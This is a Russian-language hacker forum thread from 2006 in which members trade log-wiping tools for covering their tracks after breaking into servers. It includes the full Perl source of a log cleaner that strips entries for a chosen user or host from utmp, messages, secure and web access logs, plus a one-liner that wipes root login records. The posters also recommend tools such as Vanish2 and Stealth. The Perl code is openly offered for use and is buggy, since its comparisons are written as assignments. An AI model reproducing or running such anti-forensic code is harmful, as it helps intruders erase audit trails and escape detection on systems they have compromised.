А как ВЫ чистите логи?

Discussion in 'Безопасность и Анонимность' started by drmist, 21 Apr 2006.

  1. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    Собственно сабж.
    Я обычно использую Vanish2, но у каждого логвайпера есть сови минусы и плюсы.
    Хочу знать мнение остальных.
    Кроме того, тема будет полезна для тех, кто логи НЕ чистит ))
     
    1 person likes this.
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Аналогично ванишем)
     
    _________________________
  3. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Юзаю тож ваниш.
    Фряхи и т.д не рутал,логвайперов под них не юзал.
     
    #3 Desr0w, 21 Apr 2006
    Last edited: 21 Apr 2006
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    935
    Likes Received:
    396
    Reputations:
    261
    Ванишь использую. Пока лучше не чего не видел.
     
  5. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Для приличия ссылочку на ваниш бы скинули =))
     
  6. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
  7. haZard0us

    haZard0us Elder - Старейшина

    Joined:
    18 Apr 2006
    Messages:
    26
    Likes Received:
    12
    Reputations:
    5
    #!/usr/bin/perl
    # ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
    # ' HATS Security Team http://security.nitro.ru '
    # ' '
    # ' HLogCleaner [hlogcleaner_0.1_pub.rar] '
    # ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
    # ' [v 0.1 public] '
    # ' '
    # ' Copyright © 2005-2006 Dmitri Gavrilov '
    # ' '
    # ' Released under the terms & conditions of v2 of the GNU General '
    # ' Public License. For details refer visit http://gnu.org '
    # ' '
    # ' [version 0.1] >> Первый релиз '
    # ' '
    # ' <info> '
    # ' Программа для очистки бинарных и текстовых лог-файлов '
    # ' '
    # ' Coded by GeW [[email protected]] '
    # ' Greets to all HATS Security Team members '
    # ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
    use Getopt::Std;
    use Socket;
    if (@ARGV < 1) { &help; }
    getopt("uh");
    if ($ARGV[0] = "1")
    {
    print "\n[ start cleaning ]\n";
    binary("/var/run/utmp");
    print "[ stop cleaning ]\n";
    }
    if ($ARGV[0] = "2")
    {
    print "\n[ start cleaning ]\n";
    ascii("/var/log/messages");
    print "[ stop cleaning ]\n";
    }
    if ($ARGV[0] = "3")
    {
    print "\n[ start cleaning ]\n";
    ascii("/var/log/secure");
    print "[ stop cleaning ]\n";
    }
    if ($ARGV[0] = "4")
    {
    print "\n[ start cleaning ]\n";
    ascii("/usr/local/www/logs/access_log");
    print "[ stop cleaning ]\n";
    }
    if ($ARGV[0] = "5")
    {
    print "\n[ start cleaning ]\n";
    binary("/var/run/utmp");
    ascii("/var/log/messages");
    ascii("/var/log/secure");
    ascii("/usr/local/www/logs/access_log");
    print "[ stop cleaning ]\n";
    }
    sub binary
    {
    use User::Utmp qw(utmpname getut putut);
    $file = shift;
    utmpname($file);
    @utmp = getut();
    open(TMP,">/tmp/.tmp");
    close(TMP);
    utmpname("/tmp/.tmp");
    foreach $entry (@utmp)
    {
    putut($entry)
    if ($entry->{"ut_user"} ne $opt_u && $entry->{"ut_host"} ne $opt_h);
    }
    system("mv /tmp/.tmp $file");
    return 1;
    }
    sub ascii
    {
    $file = shift;
    open(READ,"$file");
    open(WRITE,">/tmp/.tmp");
    while(<READ>)
    {
    print WRITE $_
    if ($_!~/$opt_h/);
    }
    system("mv /tmp/.tmp $file");
    }
    sub help
    {
    print "\n";
    print (<<"end");
    ===================================================================
    HATS Log Cleaner [version 0.1 public]
    Coded by GeW [[email protected]]
    Greets to all HATS Security Team members
    usage: perl hlogcleaner.pl <cleaning type>
    types: 1 - /var/run/utmp [binary]
    2 - /var/log/messages [ascii]
    3 - /var/log/secure [ascii]
    4 - /usr/local/www/logs/access_log [ascii]
    5 - all cleaning types
    example: perl hlogcleaner.pl 5
    ===================================================================
    end
    exit();
    }


    =======================

    много багов, но работа над ним кипит=)
     
    1 person likes this.
  8. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Использую только всои чистильщики
     
  9. Fashion

    Fashion Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    28
    Likes Received:
    3
    Reputations:
    0
    руками
     
  10. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    Fashion
    Тогда давай подробнее - все кругом сгорают от любопытства :)))
     
  11. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Да,мне чесное слово тоже очень интересно...
    Мы ведь лохи-юзаем логклинеры...
    Настоящие Х всё делают руками.
     
  12. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Я вот тут случайно наткнулся на статью о логвайперах.
    read
     
  13. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    я юзаю от XasClan'a
     
  14. rent0n

    rent0n Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    119
    Likes Received:
    19
    Reputations:
    2
    Да ты прав б/п.
    Посмотри мою статейку про очистку бинарных логов /var/run/utmp, /var/log/lastlog и /var/log/wtmp в разделе статьи...Там еще исходник есть неболшой проги, которая не только удаляет необоходимую запись, но и меняет дату изменения файла. Вот ссыла на статью http://forum.antichat.ru/thread15355.html
     
  15. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Юзаю логвайпер от лимпомпо, на своем велосипеде кататься приятней, так сказать.
     
    3 people like this.
  16. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Вантусом подчищаю, т.к больше нечего не юзал.
     
    1 person likes this.
  17. trick-aza

    trick-aza Member

    Joined:
    23 Apr 2006
    Messages:
    2
    Likes Received:
    6
    Reputations:
    11
    Народ Vanish хорошая штука но иногда она почему то не работает(не надо говорить что chmod не с тем битом, дело не в этом ... есть ядра 2.4 которые не ломаются) - дак вот на такой случай Альтернатива это Stealth - бинраный и текстовой. Последнее время юзаю только его.
     
  18. X-3

    X-3 Member

    Joined:
    28 Mar 2009
    Messages:
    306
    Likes Received:
    58
    Reputations:
    -2
    Сейчас юзаю cron, раньше - ручками.
     
  19. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    # logwipe `who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}' `
     
    1 person likes this.